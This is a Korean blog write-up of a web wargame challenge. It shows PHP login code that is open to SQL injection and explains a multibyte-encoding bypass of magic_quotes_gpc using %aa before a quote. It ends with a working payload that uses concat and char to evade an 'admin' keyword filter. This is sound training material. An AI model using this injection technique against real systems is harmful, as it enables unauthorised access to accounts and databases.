본문 바로가기
Wargame(CTF)

Challenge 45

by Hide­ 2014. 6. 12.
반응형

ID 와 PW를 입력하여 로그인하는 간단한 폼이 존재한다.

소스를 확인해보자.

 

<?

$pw
="?????"
;

if(
$_GET[id] && $_GET[pw
])
{

$_GET[id]=mb_convert_encoding($_GET[id],'utf-8','euc-kr'
);

$data=@mysql_fetch_array(mysql_query("select id from members where id='$_GET[id]' and pw=md5('$_GET[pw]')"
));

if(
eregi("admin",$_GET[id
])) exit();
if(
eregi("from",$_GET[id
])) exit();
if(
eregi("union",$_GET[id
])) exit();
if(
eregi("limit",$_GET[id
])) exit();
if(
eregi("union",$_GET[pw
])) exit();
if(
eregi("pw",$_GET[pw
])) exit();
if(
eregi("=",$_GET[pw
])) exit();
if(
eregi(">",$_GET[pw
])) exit();
if(
eregi("<",$_GET[pw
])) exit();


if(
$data
)
{
echo(
"hi $data[0]<br><br>"
);

if(
$data[0]=="admin") @solve
();
}



중간부분쯤에 $_GET[id]=mb_convert_encoding($_GET[id],'utf-8','euc-kr'); 

라는 부분이 존재한다. 멀티바이트 취약점 문제이다.

해당 함수에는 취약점이 존재한다.

싱글쿼터(%27) 앞에 %aa 와 같은 값을 넣어주게 되면 magic_quotes_gpc 의 영향을 받지 않고

싱글쿼터를 사용할 수 있다.  (멀티바이트의 범위 : %a1 ~ %fe)

위의 소스상에서는 admin 이라는 문자열도 필터링을 하고 있으므로

concat+char 을 이용하여 우회한다.

 

최종 페이로드 : id=guest%aa%27 or id in(concat(char(97),char(100),char(109),char(105),char(110)))%23

 

많은 워게임들이 해당 취약점을 대상으로한 문제들을 출제하고 있어서 쉽게 풀 수 있었다.

 

PS. 풀당시에 =도 필터링하는것으로 보고 in을 이용하여 우회했었는데 pw 부분에서만 필터링하고 있었다..

'Wargame(CTF)' 카테고리의 다른 글

Challenge 13  (0) 2014.06.15
Challenge 57  (0) 2014.06.12
Challenge 51  (0) 2014.06.10
Challenge 55  (0) 2014.06.08
[Suninatas] Level 28  (0) 2014.05.13